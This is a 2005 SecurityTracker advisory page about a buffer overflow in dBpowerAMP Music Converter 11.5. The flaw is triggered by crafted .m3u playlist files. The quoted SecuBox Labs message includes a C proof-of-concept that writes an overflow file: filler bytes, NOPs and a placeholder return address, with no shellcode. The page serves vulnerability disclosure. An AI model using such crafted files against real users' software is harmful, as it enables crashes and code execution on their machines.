SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   dBpowerAMP Music Converter Vendors:   Illustrate
dBpowerAMP Music Converter Buffer Overflow in '.m3u' Playlist Files May Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015415
SecurityTracker URL:  http://securitytracker.com/id/1015415
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 28 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 11.5 and prior versions
Description:   fRoGGz of SecuBox Labs reported a vulnerability in dBpowerAMP Music Converter. A remote user can cause arbitrary code to be executed on the target user's system.

A remote user can create a specially crafted '.m3u' playlist file that, when processed by the target user, will trigger a buffer overflow and execute arbitrary code. The code will run with the privileges of the target user.

The original advisory is available at:

http://secubox.shadock.net/dBpowerAMP_Music_Converter_v11.5_Local_Buffer_Overflow_Issue.html

Impact:   A remote user can create a file that, when loaded by the target user, will cause arbitrary code to be executed on the target user's system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.dbpoweramp.com/dbpoweramp.htm (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  dBpowerAMP Music Converter v11.5 and priors Local Buffer Overflow

dBpowerAMP Music Converter v11.5 and priors Local Buffer Overflow Issue
Original: http://secubox.shadock.net/dBpowerAMP_Music_Converter_v11.5_Local_Buffer_Overflow_Issue.html


VULNERABLE PRODUCT
-----------------------------------
Software: dBpowerAMP Music Converter
Corporation: Illustrate
Release: 11.5 and priors.
------------------------------------


BACKGROUND
--------------------
Often called the Swiss army knife of audio, dMC can digitally rip sound from audio 
CDs to a multitude of formats. Convert from one format to another while preserving ID 
tags. Nearly every audio type is supported, including MP3, MP4, Windows Media Audio, 
OGG Vorbis, AAC, Monkey's Audio, FLAC, ...
It works from the Windows Explorer right click menu, where it provides quick access to one-click conversion
as well as a new pop-up info box that displays detailed file information for supported formats.
In addition, you can use dBpowerAMP to extract (rip) files from a CD, featuring automatic CDDB support.
CD Ripping is very fast and according to the developer s tests it claims to be the fastes around.


DESCRIPTION
--------------------
A malicious playlist file format ".m3u" file can generate a local exploitation of a buffer overflow
and allows attackers to execute arbitrary code under the context of the user who started the process.


PROOF OF CONCEPT
--------------------------------
Build & mouse over the file or open it ... as you want.



/*
Illustrate dBpowerAMP dMCShell Module Buffer Overflow
Date: 23 December, 2005
Credits: SecuBox Labs
Discovered by: fRoGGz
*/

#include <stdio.h>

char SecuBox[]=
"\x3A\x20\x53\x65\x63\x75\x42\x6F\x78\x20\x4C\x61\x62\x73\x20\x3A"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\x2D\x2D\x5B\x20\x32\x36\x30\x20\x20\x42\x6F\x46\x20\x5D\x2D\x2D"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\x90\x90\x90\x90"
"\x41\x41\x41\x41"; // AAAA ...

int main(int argc, char* argv[]) {
FILE *fp;

printf ("SecuBox Labs - Proof Of Concept\n");
printf ("Illustrate dBpowerAMP dMCShell Module Buffer Overflow\n\n");

fp = fopen ("SecuBox.Labs.m3u","w+");
if (!fp) {
printf (" fopen error.\n");
return -1;
}

fwrite (SecuBox, 1, strlen(SecuBox) , fp);
fclose (fp);

printf ("SecuBox.Labs.m3u created.\n");
return 0;

}



CREDiTS
----------------------
SecuBox Labs - fRoGGz
Visit: http://secubox.shadock.net
--------------------------------------------------





























































-- ___________________________________________________ 
Play 100s of games for FREE! http://games.mail.com/ 
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC